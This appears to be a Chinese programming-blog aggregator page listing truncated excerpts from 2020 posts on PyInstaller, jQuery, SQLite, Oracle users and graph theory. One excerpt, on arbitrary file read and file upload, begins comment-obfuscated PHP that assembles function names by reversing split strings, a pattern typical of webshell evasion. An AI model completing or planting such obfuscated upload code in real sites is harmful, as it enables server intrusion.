1.安装pyinstaller pip install pyinstaller 2.打包 打开cmd,切换到需要打包的文件(demo.py)目录。执行 pyinstaller -F -w demo.py。 生成的exe文件就在子目录dist中。-F表示指定打包后只生成一个exe格式的文件,-w表示窗 ...
分类:
其他好文 时间:
2020-05-18 12:40:14
阅读次数:
199
一、jquery 属性操作 1、增加和删除属性 $("#id").attr("data-index",4),$("#id").removeAttr("data-index");自定义属性,建议使用attr $("#checkbox").prop("checked",false), $("#check ...
分类:
Web程序 时间:
2020-05-18 10:49:27
阅读次数:
65
$(function(){ //输入框正在输入时 $("#ipt").on('input',function(){ if(!($('#ipt').val()=='')){ $(".cancle_ico").removeClass('hide'); }else{ $(".cancle_ico").ad ...
分类:
Web程序 时间:
2020-05-18 00:33:00
阅读次数:
83
#写一个骰子游戏 import random class Game: def __init__(self,player1,player2): self.player1 = player1 self.player2 = player2 def star_game(self): self.player1 ...
分类:
其他好文 时间:
2020-05-17 22:01:42
阅读次数:
87
SQLite的数据库中表的增删改查(下面用添加,删除,更新,查询) 以下关于一些布局的按钮就不贴代码了. 添加代码:SQLiteDatabase中提供了一个insert()方法,它接受三个参数,第一个参数是表名;第二个三叔用于在未指定添加数据的情况下给某些可为空的列自动赋值null;第三个参数是一个 ...
分类:
移动开发 时间:
2020-05-17 00:57:31
阅读次数:
91
oracle中的用户详解 【转】 原创 Linux操作系统 作者:可爱灰狼 时间:2013-09-17 17:56:07 2895 0 http://f.dataguru.cn/thread-128531-1-1.html oracle中的用户很多,也很令初学者费解.oracle中的帐户分为两类:一 ...
分类:
数据库 时间:
2020-05-16 14:04:24
阅读次数:
86
In graph theory, a caterpillar or caterpillar tree is a tree in which all the vertices are within distance 1 of a central path. The central path can b ...
分类:
其他好文 时间:
2020-05-15 18:05:19
阅读次数:
77
任意文件读取 move_uploaded_file文件上传 <?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."e ...
分类:
Web程序 时间:
2020-05-15 15:27:12
阅读次数:
75
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document< ...
分类:
Web程序 时间:
2020-05-15 11:41:24
阅读次数:
67